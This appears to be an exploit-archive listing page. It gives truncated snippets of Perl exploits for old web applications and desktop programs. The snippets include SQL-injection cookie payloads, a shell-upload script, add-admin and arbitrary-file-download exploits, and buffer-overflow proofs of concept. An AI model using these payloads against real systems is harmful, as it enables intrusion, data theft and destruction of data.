Crux Gallery 1.32 - Insecure Cookie Handling

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Crux Gallery eNYe-Sec - www.enye-sec.org Program description by the author website Bug Exploit Note: POST is not checked and you can enter all by GET. Also you can create a simple perl script to send GET and POST packages. Navigate by...

Invision Power Board 2.* commands execution exploit by RST/GHC

No description provided by source. !/usr/bin/perl Invision Power Board 2. commands execution exploit by RST/GHC vulnerable versions = 2.1.5 tested on 2.1.4, 2.0.2 coded by 1dt.w0lf RST/GHC http://rst.void.ru http://ghc.ru use IO::Socket; use Getopt::Std; getopts"l:h:p:d:f:v:"; $host = $opth; $dir...

oscmax-upload.txt

!/usr/bin/perl use strict; use warnings; use LWP::UserAgent; use HTTP::Request::Common; print ; print "Localpath of shellC:/whatever: "; chompmy $file=; my $ua = LWP::UserAgent-new; my $re = $ua-requestPOST $url.'FCKeditor/editor/filemanager/browser/default/connectors/test.html', ContentType =...

Rianxosencabos CMS 0.9 - Remote Add Admin

!/usr/bin/perl -w Rianxosencabos CMS 0.9 Remote Add Admin Exploit Download: http://downloads.sourceforge.net/rsccms/rsccms.tar.gz written by ka0x D.O.M Labs - Security Researchers - www.domlabs.org - use LWP::UserAgent; my $host, $login, $pass, $mail, $userid = @ARGV ; unless$ARGV4 print " usage:...

addalink <= 4 Arbitrary Admin Access Vulnerability Exploit

No description provided by source. addalink = 4 Arbitrary Admin Access Vulnerability Exploit url: http://sourceforge.net/projects/addalink/ Author: JosS mail: sys-projectathotmaildotcom site: http://spanish-hackers.com team: Spanish Hackers Team - SHT This was written for educational purpose. Use...

Sports Clubs Web Panel 0.0.1 - Remote Game Delete

Sports Clubs Web Panel 0.0.1 - Remote Game Delete !/usr/bin/perl -W Sports Clubs Web Panel 0.0.1 Remote Game Delete Exploit File affected: include/draw-delete.php id Vuln Code: 06: $did = $GET'id'; 08: mysqlquery"DELETE FROM draw WHERE did='$did'"; by ka0x D.O.M Labs - Security Researchers -...

Sports Clubs Web Panel 0.0.1 - Remote Game Delete

!/usr/bin/perl -W Sports Clubs Web Panel 0.0.1 Remote Game Delete Exploit File affected: include/draw-delete.php id Vuln Code: 06: $did = $GET'id'; 08: mysqlquery"DELETE FROM draw WHERE did='$did'"; by ka0x D.O.M Labs - Security Researchers - www.domlabs.org - ka0x@domlabs:/codes$ ./sportspanel.p...

Libera CMS 1.12 - 'cookie' SQL Injection

!/usr/bin/perl ---------------------------------------------------------- Libera CMS agent"Mozilla/4.5 en Win95; U"; $https-timeout1; $https-defaultheader'Cookie' = "liberastaffpass=' or '1=1"; $request = $https-post$hostname."/admin.php?action=adduserprocess", username = $username, password =...

Acoustica MP3 CD Burner 4.51 Build 147 - '.asx' Local Buffer Overflow

!/usr/bin/perl Acoustica MP3 CD Burner asx file Local BOF Exploit Author: Koshi Date: 08-29-08 0day Application: Acoustica MP3 CD Burner Version: 4.51 Build 147 possibly older Site: http://acoustica.com/download.htm Tested On: Windows XP SP3 Fully Patched Based off of n00b's findings...

Pars4U Videosharing V1 XSS / Remote Blind SQL Injection Exploit

No description provided by source. !/usr/bin/perl use LWP::UserAgent; use Getopt::Long; if!$ARGV1 print " \n"; print " VIVA ISLAME VIVA ISLAME \n"; print " VIVA ISLAME VIVA ISLAME \n"; print " \n"; print " Pars4u Videosharing V1 Blind SQL Injection Exploit \n"; print " \n"; print "...

Pars4U Videosharing 1.0 - Cross-Site Scripting / Blind SQL Injection

!/usr/bin/perl use LWP::UserAgent; use Getopt::Long; if!$ARGV1 print " \n"; print " VIVA ISLAME VIVA ISLAME \n"; print " VIVA ISLAME VIVA ISLAME \n"; print " \n"; print " Pars4u Videosharing V1 Blind SQL Injection Exploit \n"; print " \n"; print " categoriesportal.php catid \n"; print "...

K-Links Directory Blind SQL Injection Exploit

!/usr/bin/perl K-Links Directory Blind SQL Injection Exploit ..::virangar security team::.. www.virangar.net C0d3d BY:virangar security team hadihadi special tnx to: MR.nosrati,black.shadowes,MR.hesy,Ali007,Zahra & all virangar members & all hackerz my lovely friends hadiaryaie2004 & arashimm02ta...

Pcshey Portal - 'kategori.asp' SQL Injection

source: https://www.securityfocus.com/bid/30534/info Pcshey Portal is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow an attacker to compromise the application, access or modify...

moziloCMS 1.10.1 (download.php) Arbitrary Download File Exploit

No description provided by source. !/usr/bin/perl moziloCMS 1.10.1 Perl exploit discovered & written by Ams ax330d doggy gmail dot com DESCRIPTION: Vulnerability hides in "download.php", which we can use to download any file we want to. Here, for example, "admin/conf/logindata.conf". Btw, not ver...

eNdonesia 8.4 (Calendar Module) - SQL Injection

eNdonesia 8.4 Calendar Module - SQL Injection !/usr/bin/perl /-----------------------------------------------\ | /-----------------------------------------\ | | | Remote SQL Exploit | | | | eNdonesia 8.4 Remote SQL Exploit | | | | www.endonesia.org | | | | Calendar Module | | |...

HRS Multi (picture_pic_bv.asp key) Blind SQL Injection Exploit

No description provided by source. !/usr/bin/perl use LWP::UserAgent; use Getopt::Long; if!$ARGV1 print " \n"; print " Viva IslaMe Viva IslaMe \n"; print " HRS Multi Blind SQL Injection Exploit \n"; print " picturepicbv.asp key \n"; print " Author: Mr.SQL \n"; print " EMAIL : [email protected] \n";...

IntelliTamper 2.07 (server header) Remote Code Execution Exploit

No description provided by source. !/usr/bin/perl IntelliTamper 2.07 Remote Code Execution server header By: Koshi Guido Landi finally did it, thought i'd throw one in there. This example assumes you're scanning "http://127.0.0.1" For example, exploit may not work if you were to scan...

intellitamper207-exec.txt

!/usr/bin/perl IntelliTamper 2.07 Remote Code Execution server header By: Koshi Guido Landi finally did it, thought i'd throw one in there. This example assumes you're scanning "http://127.0.0.1" For example, exploit may not work if you were to scan "http://127.0.0.1:80" or even changing it as...

IntelliTamper 2.0.7 (html parser) Remote Buffer Overflow PoC

Exploit for unknown platform in category dos / poc ============================================================ IntelliTamper 2.0.7 html parser Remote Buffer Overflow PoC ============================================================ !/usr/bin/perl ksOSe - 07/21/2008 There are some BOFs in the html...

intellitamper-poc.txt

!/usr/bin/perl ksOSe - 07/21/2008 This is NOT http://secunia.com/advisories/20172/. There are some BOFs in the html parser, just put a properly formatted html file in your website and launch IntelliTamper against it. use warnings; use strict; my $evilhtml = 'ph33r' . 'ph33r' . ""; print $evilhtml...